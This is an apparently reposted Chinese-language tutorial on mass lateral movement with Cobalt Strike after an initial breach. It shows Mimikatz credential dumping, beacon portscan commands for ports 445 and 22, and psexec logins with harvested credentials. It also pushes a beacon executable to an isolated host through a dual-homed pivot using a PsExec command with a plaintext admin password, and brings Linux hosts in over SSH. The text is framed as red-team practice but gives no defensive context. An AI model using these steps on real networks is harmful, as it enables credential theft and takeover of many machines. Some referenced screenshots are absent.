如何利用CobalStrike进行批量上线？

言：

当获取一台目标服务器权限时，更多是想办法扩大战果，获取目标凭据并横向进行登陆是最快速的拿权方式。但目标所处环境是否可出网，如何利用CobalStrike进行批量上线？

一、获取凭证：

目标机器CobalSt rike上线后，通常先抓取该主机凭据，选择执行Access->Run Mimikatz，或在 Beacon中执行logonpasswords命令。需要当前会话为管理员权限，才能成功，如果权限低，先提权~

下面的是执行logonpasswords

图形中是这个。

然后查看凭证，Gredentials

但是不是每次都能抓取到明文

二、目标机出网:

获取凭据后，需要对目标网段进行端口存活探测，缩小范围。探测方式比较多，本文仅依托CobalSt rike 本身完成，不借助其他工具。因为是psexec传递登录，这里仅需探测445端口。（ psexec :在主机上使 用服务派生会话）

使用portscan命令：ip网段—ports端口 一扫描协议（arp、icmp、none） 一线程（实战不要过高）。

这里我环境开了一台03的虚拟机，地址是192.168.19.134看能搜集到探测她的445端口

beacon> portscan 192.168.19.0/24 445 arp 200

点击工具栏的V iew->Ta rgets，查看端口探测后的存活主机。

然后右键，用之前收集到的凭证去试其他存活主机。如果在一个域中，所有主机的用户名和密码应该都 是一致的。

右键机器:

然后选择之前的获取的账号和密码，明文密文都可以，session选择之前的控机。

然后在beacon中就可以看到执行的命令。并且这台03的机器就会成功的上线

三、目标机不出网

实战中经常会遇到这种情况，获取到目标内网中某台主机的系统权限，但是该主机处在隔离网络中，不能出网。又因为CobalStrike服务端是搭建在互联网中的，通过常规方式是无法上线的，这里就需要利用已上线的主机，将它做一个Listener,实现链路上线CobalStrike。

注：此实验只能在4.0版本以下进行

环境模拟：

主机08服务器：192.168.203.128/24 #不出网

边界服务器：win7双网卡：192.168.19.132、192.168.203.129

vps：X.X.X.X

win7和08服务器能互相访问，但是vps访问不了08已有权限win7,试验目的，想要08系统在CS端上线，这里借鉴一下网上的方法，利用PxExec来把生成的后门传到不出网机器上，

首先把他们两个放到一个目录下

那么如何放进去呢？CS自带一个文件浏览器，只不过速度有些慢，可以的话尽量用webshell工具，直接上刀上剑放蝎子。。

这里是放到已控机器的同一目录。

然后执行命令:

beacon> shellC:\Windows\Temp\PsExec64.exe-accepteula \\192.168.203.129,192.168.203.128 -uadministrator-pasdqwe123. -d-cC:\Windows\Temp\beacon65.exe

等待上线即可、、

个人觉得这个方法太过麻烦，如果这里用l cx,ew等代理攻击进行的话，会更加的省时省力~

四、Linux主机-SSH批量上线

第一步还是探测存活主机，然后利用已控的机器进行操作上线。

环境：

CentOS: 192.168.19.139

win7:192.168.19.132

vps :x.x.x.x

通过扫描发现机器：

beacon> portscan 192.168.19.100-150 22 arp 200

然后观看存活主机

然后

建议用ssh-key

密码建议用其他方式去获取，这里爆破的话效率不高输入对的账号密码后

然后正常等待上线即可

成功上线

转自：MS08067